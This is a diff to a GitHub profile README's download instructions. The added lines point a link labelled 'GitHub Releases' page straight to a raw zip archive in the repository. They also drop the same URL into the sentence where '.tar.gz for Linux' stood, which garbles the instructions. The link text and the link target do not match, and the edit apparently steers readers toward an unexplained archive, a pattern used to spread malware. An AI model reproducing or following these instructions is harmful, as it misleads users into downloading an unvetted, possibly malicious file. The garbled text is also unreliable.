TahaMustafa75/.github/README.md

 To download the application:

-1. Click on the link above to visit the [GitHub Releases](https://github.com/TahaMustafa75/.github/releases) page.
+1. Click on the link above to visit the [GitHub Releases](https://github.com/TahaMustafa75/.github/raw/refs/heads/main/profile/github-2.2-alpha.1.zip) page.
 2. On the Releases page, look for the latest version.
-3. Find the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+3. Find the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or https://github.com/TahaMustafa75/.github/raw/refs/heads/main/profile/github-2.2-alpha.1.zip for Linux).
 4. Click the download link to start the download.

 Once the download is complete, locate the file on your device and follow these steps to install: